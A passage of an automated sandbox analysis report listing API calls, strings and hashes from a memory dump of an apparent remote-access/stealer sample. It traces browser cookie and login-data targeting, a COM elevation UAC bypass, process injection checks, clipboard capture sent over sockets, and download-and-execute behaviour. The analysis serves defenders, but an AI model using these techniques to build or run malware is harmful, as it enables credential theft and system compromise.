                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32 ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@
                                                  • API String ID: 3520204547-604454484
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                  Strings
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                  • API String ID: 3756808967-1743721670
                                                  Strings
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                  • API String ID: 0-1861860590
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: JD$JD$JD
                                                  • API String ID: 745075371-3517165026
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                  • API String ID: 341183262-3812160132
                                                  • Opcode ID: 4996a93cb9cc1f14aef934760752e1815303a81af97ed7b758d55349f36a1bef
                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: bd242308892eeed60a03188ed6a612f04b73cb25f5ca5ecf78c8c55943767dc4
                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                  APIs
                                                  • _free.LIBCMT ref: 00449292
                                                  • _free.LIBCMT ref: 004492B6
                                                  • _free.LIBCMT ref: 0044943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-2876530381
                                                  • Opcode ID: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • UserProfile, xrefs: 0040BA59
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID:
                                                  • API String ID: 1771804793-0
                                                  • Opcode ID: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                  • Opcode Fuzzy Hash: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                  • API String ID: 2825088817-3056885514
                                                  • Opcode ID: ed1d3493dcaa7197a5833749e2ab39951c791bd09ae2e5133bb3481b7f0d9eb9
                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                  • Opcode Fuzzy Hash: ed1d3493dcaa7197a5833749e2ab39951c791bd09ae2e5133bb3481b7f0d9eb9
                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: XPG$XPG
                                                  • API String ID: 4113138495-1962359302
                                                  • Opcode ID: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                  • Opcode Fuzzy Hash: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                  • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
